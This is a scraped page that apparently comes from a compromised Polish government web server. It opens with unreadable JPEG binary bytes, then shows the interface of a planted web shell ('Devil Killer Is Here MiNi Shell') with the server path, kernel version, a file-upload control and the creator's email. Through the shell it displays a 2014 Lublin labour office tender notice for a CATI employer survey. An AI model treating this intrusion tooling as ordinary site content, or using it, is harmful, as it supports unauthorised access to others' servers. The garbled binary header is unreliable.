JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/129522-N-2014.html

<p class="kh_header"><b>Lublin: Realizacja w roku 2014 w ramach projektu systemowego 
Lubelskie Obserwatorium Rynku Pracy - kontynuacja, ilościowego badania pt. Potrzeby i oczekiwania pracodawców zatrudniających co najmniej 10 pracowników, wśród podmiotów gospodarki narodowej, z wykorzystaniem techniki CATI oraz wykonanie prac analitycznych związanych z badaniami 
wraz z przygotowaniem raportów po pierwszej i drugiej fali badania</b><br>
<b>Numer ogłoszenia: 129522 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Lublinie , ul. Obywatelska 4, 20-092 Lublin, woj. lubelskie, tel. 81 4635300, faks 81 4635305.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja w roku 2014 w ramach projektu systemowego 
Lubelskie Obserwatorium Rynku Pracy - kontynuacja, ilościowego badania pt. Potrzeby i oczekiwania pracodawców zatrudniających co najmniej 10 pracowników, wśród podmiotów gospodarki narodowej, z wykorzystaniem techniki CATI oraz wykonanie prac analitycznych związanych z badaniami 
wraz z przygotowaniem raportów po pierwszej i drugiej fali badania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja w roku 2014, w ramach projektu systemowego Lubelskie Obserwatorium Rynku Pracy - kontynuacja, ilościowego badania pt. Potrzeby i oczekiwania pracodawców zatrudniających co najmniej 10 pracowników, wśród podmiotów gospodarki narodowej, z wykorzystaniem techniki CATI (wspomaganego komputerowo wywiadu telefonicznego).
Przygotowanie, realizacja i opracowanie badań I fali będą miały miejsce w okresie maj 2014 r. - lipiec 2014 r., II fali badań w okresie październik - grudzień 2014 r. W ramach zamówienia mieści się prowadzenie bazy wynikowej w programie MS Excel lub SPSS (jako podstawy do analiz), przygotowanie w wersji elektronicznej dwóch raportów tj. po pierwszej i po drugiej fali badania (drugi będzie zawierał wnioski z dwóch fal badania) oraz przygotowanie dwóch baz danych (rekrutacje skuteczne i nieskuteczne) w formacie .xls na potrzeby portalu wirtualnydoradca.wup.lublin.pl, według schematu przekazanego przez Zamawiającego. Przykład:
1. Stanowisko - zawód; 2. Powiat - bialski, parczewski, radzyński, włodawski, m. Biała Podlaska, biłgorajski, chełmski, hrubieszowski, krasnostawski, tomaszowski, zamojski, m. Chełm, m. Zamość, lubartowski, lubelski, łęczyński, świdnicki, m. Lublin, janowski, kraśnicki, łukowski, opolski, puławski, rycki; 3. Poziom wykształcenia - podstawowe, gimnazjalne, zasadnicze zawodowe, średnie ogólnokształcące, średnie techniczne, wyższe humanistyczne ekonomiczne, wyższe techniczne, nie ma znaczenia; 4. Minimalne doświadczenie zawodowe (w latach); 5. Wiek od (w latach); 6. Wiek do (w latach); 7. Rodzaj umowy- umowa o pracę na czas określony, umowa o pracę na czas nieokreślony, umowa o dzieło, umowa zlecenie, samozatrudnienie, inna forma; 8. Liczba etatów; 9. Wymiar etatu; 10. Proponowane zarobki; 11. Data zgłoszenia oferty; 12. Data ważności oferty; 13. Opis (inne informacje, w tym wymagane kwalifikacje); 14. Rekrutacja zakończona sukcesem? - tak, nie; 15. Przyczyna nieznalezienia kandydatów do pracy.
Bazy powstaną poprzez zgromadzenie szczegółowych danych dotyczących prowadzenia rekrutacji pracowników przez instytucje i firmy, w ciągu 12 miesięcy przed miesiącem badania. Identyfikowane stanowiska - zawody, w których prowadzona były rekrutacje muszą być przypisywane do miejsc wykonywania pracy tj. powiatów. Jeden zawód może być przypisany do jednego, kilku lub wszystkich powiatów. Ostatni przypadek występuje wtedy jeśli miejsce wykonywania pracy w rekrutowanym zawodzie to całe województwo lubelskie, bez ograniczeń terytorialnych. Identyfikacja zawodów (przez ankietera) musi być oparta o Klasyfikację Zawodów i Specjalności (w wersji przekazanej przez Zamawiającego).
Ramy metodyczne badania:
Badanie CATI będzie realizowane dwukrotnie. Każda z fal badania zrealizowana będzie na próbie co najmniej 500 podmiotów gospodarki narodowej. Podmioty biorące udział w pierwszej fali badania mogą, ale nie muszą brać udziału w drugiej fali badania. W próbach nie mogą znaleźć się podmioty zatrudniające mniej niż 10 pracowników. Konieczne jest przeprowadzenie co najmniej 1000 pełnych wywiadów telefonicznych (CATI). W uzasadnionych przypadkach, po uzgodnieniu z Zamawiającym, dopuszcza się możliwość  zastosowania w poszczególnych wywiadach techniki CAPI (komputerowo wspomagany wywiad osobisty). Zamawiający będzie wymagał udostępnienia nagrań ze wszystkich wywiadów.
Sposób doboru próby musi pozwalać na realizację wszystkich celów badania. Dobór musi brać pod uwagę wymagania dotyczące parametrów próby. Dopuszcza się włączenie do próby podmiotów gospodarki narodowej z siedzibą poza województwem lubelskim (w liczbie co najwyżej 100 na każdą falę badania), lecz jedynie pod warunkiem, że dany podmiot w ciągu 12 miesięcy przed miesiącem badania rekrutował do pracy na terenie tego województwa (co najmniej część pracy przewidziana była do wykonania na terenie województwa lubelskiego). W przypadku podmiotów z siedzibą w województwie lubelskim warunkiem koniecznym znalezienia się w próbie jest spełnianie kryterium zatrudniania  10 lub więcej pracowników w chwili badania. Sposób weryfikacji kwalifikowalności podmiotu do badania musi być opisany przez Wykonawcę.  
Wymagania dotyczące parametrów próby:
Minimum 500 podmiotów gospodarki narodowej (podczas I i podczas II fali badania) zatrudniających w chwili badania co najmniej 10 pracowników (łącznie z oddziałami), z czego minimum 400 z siedzibą w województwie lubelskim
Minimum 1/3 pracodawców z województwa lubelskiego z deklaracją o odbytej/ych rekrutacji/ach
Siedziby pracodawców z województwa lubelskiego odpowiadające podregionom (granice wg GUS):
minimum 35 pracodawców z siedzibą w podregionie bialskim, przy czym co najmniej 1 pracodawca z każdego powiatu podregionu z deklaracją o odbytej/ych rekrutacji/ach 
minimum 68 pracodawców z siedzibą w podregionie chełmsko-zamojskim, przy czym co najmniej 1 pracodawca z każdego powiatu podregionu z deklaracją o odbytej/ych rekrutacji/ach 
minimum 51 pracodawców z siedzibą w podregionie puławskim, przy czym co najmniej 1 pracodawca z każdego powiatu podregionu z deklaracją o odbytej/ych rekrutacji/ach 
minimum 96 pracodawców  z siedzibą w podregionie lubelskim, przy czym co najmniej 1 pracodawca z każdego powiatu podregionu z deklaracją o odbytej/ych rekrutacji/ach
Ramy merytoryczne badania:
Badania ilościowe i analiza ich wyników zrealizują następujące cele:
Cel 1 - identyfikacja zawodów (według Klasyfikacji Zawodów i Specjalności) i szczegółowych wymagań odnośnie kandydatów do pracy, pojawiających się w przeprowadzonych w ciągu ostatniego roku rekrutacjach (w tym nieskutecznych) oraz ustalenie przyczyn nieznalezienia kandydatów do pracy spełniających wymagania
Cel 2 - określenie potencjałów zatrudnieniowych firm, w minimum 10 branżach, z siedzibą w województwie lubelskim
Cel 3 - ustalenie zamiarów pracodawców dotyczących planowanych rekrutacji i oczekiwań odnośnie kwalifikacji kandydatów do pracy oraz diagnoza zapotrzebowania na profile szkół ponadgimnazjalnych i kierunki szkół wyższych, kształcących adekwatnie do zapotrzebowania kadrowego pracodawców z siedzibą w województwie lubelskim i zgodnie z ich rekomendacjami.
Pytanie o odbyte i planowane rekrutacje dotyczy rekrutacji pracowników na własne potrzeby (może być to rekrutacja zlecana, wewnętrzna, poprzez urząd pracy itd.), a nie w roli agencji zatrudnienia. Badanie ma charakter powtarzalny, aby uchwycić lub potwierdzić ewentualne trendy (także z odniesieniem do powtarzalnych badań pracodawców w LORP w latach 2012-2013) i podkreślić te wyniki, które w obu falach się powtórzą. Uzyskane wnioski powinny być użyteczne dla: instytucji otoczenia biznesu, instytucji rynku pracy, osób poszukujących zatrudnienia. Analiza musi określać rekomendacje możliwych działań dla instytucji wsparcia biznesu, instytucji rynku pracy i kształcenia. Dla podzbioru przedsiębiorstw (z siedzibą w województwie lubelskim) w próbie musi zostać przygotowana (cel 2) osobna analiza (porównawcza i wewnątrzbranżowa) w odniesieniu do co najmniej 10 branż z 20 z poniższej listy:  1. rolnictwo, leśnictwo, rybołówstwo, 2. motoryzacja, 3. usługi dla ludności (w tym dostawa i naprawy systemów dostarczania wody, energii, itp.) 4. informatyka, 5. budownictwo, 6. produkcja, 7. handel hurtowy, 8. handel detaliczny, 9. transport, logistyka i magazynowanie, 10. działalność wydawnicza, 11. finanse i ubezpieczenia, 12. nieruchomości - pośrednictwo, wynajem i leasing, 13. działalność profesjonalna, naukowa i usługi techniczne, 14. doradztwo w zakresie zarządzania, 15. pomoc techniczna i administracyjna, 16. usługi edukacyjne, 17. ochrona zdrowia i pomoc społeczna, 18. sztuka, rozrywka i rekreacja, 19. zakwaterowanie (hotelarstwo itp.), 20. usługi spożywcze (restauracje, bary itp.).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.31.50.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że: w okresie ostatnich trzech lat przed wszczęciem postępowania lub w okresie prowadzenia działalności, jeśli okres ten jest krótszy niż trzy lata, należycie (posiada udokumentowane potwierdzenie) wykonał co najmniej 3 usługi badawcze i/lub projekty badawcze, których przedmiotem były zagadnienia związane z badaniem lub monitorowaniem rynku pracy, z czego co najmniej jedna dotyczyła pracodawców na próbie co najmniej 400 jednostek badania, co najmniej dwie były wykonywane techniką CATI i co najmniej jedna miała wartość nie mniejszą niż 50 000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca spełni ten warunek, jeżeli wykaże, że dysponuje zespołem analitycznym, przewidzianym do realizacji zamówienia, składającym się z co najmniej 2 osób, z których:
a)	każda legitymuje się wykształceniem wyższym, a w ciągu ostatnich 3 lat przed upływem terminu składania ofert uczestniczyła w przygotowaniu co najmniej jednej koncepcji lub przeprowadzeniu co najmniej jednego badania w obszarze rynku pracy,
b)	do kierowania zespołem analitycznym wyznaczy osobę posiadającą odpowiednie doświadczenie, tj. osobę, która co najmniej raz w ciągu ostatnich 3 lat przed upływem terminu składania ofert kierowała procesem badawczym lub go organizowała.
Wymienione osoby nie mogą zostać zmienione w trakcie realizacji umowy bez wcześniejszego przedstawienia Zamawiającemu pisemnej informacji o proponowanej zmianie wraz z wyjaśnieniem jej przyczyn oraz wyrażenia pisemnej zgody Zamawiającego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Koncepcja badawcza i metodyka badań - 40</li>
<li>3 - Poprawność merytoryczna i organizacyjna - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia następujących okoliczności:
a.	wystąpienia zgodnych z obowiązującymi przepisami prawa zmian podmiotowych po stronie Wykonawcy, w zakresie tych zmian,
b.	wystąpienia niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych, które mają wpływ na realizację zamówienia lub uniemożliwiają wykonywanie usługi, w zakresie terminu,
c.	działania siły wyższej tj. niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji, mimo zachowania należytej staranności, nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego, w zakresie harmonogramu realizacji zamówienia zgodnie z postanowieniami SIWZ oraz w zakresie terminu.
2.	Okoliczności, o których mowa w ust. 1, muszą być udokumentowane w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.bip.lubelskie.pl./index.php?id=87<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Lublinie,
ul. Obywatelska 4 pok. nr 106 (I p.)
20- 092 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2014 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Lublinie,
ul. Obywatelska 4 pok. nr 216 (II p.)
20- 092 Lublin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane w 85% ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz w 15% ze środków krajowych w ramach budżetu państwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com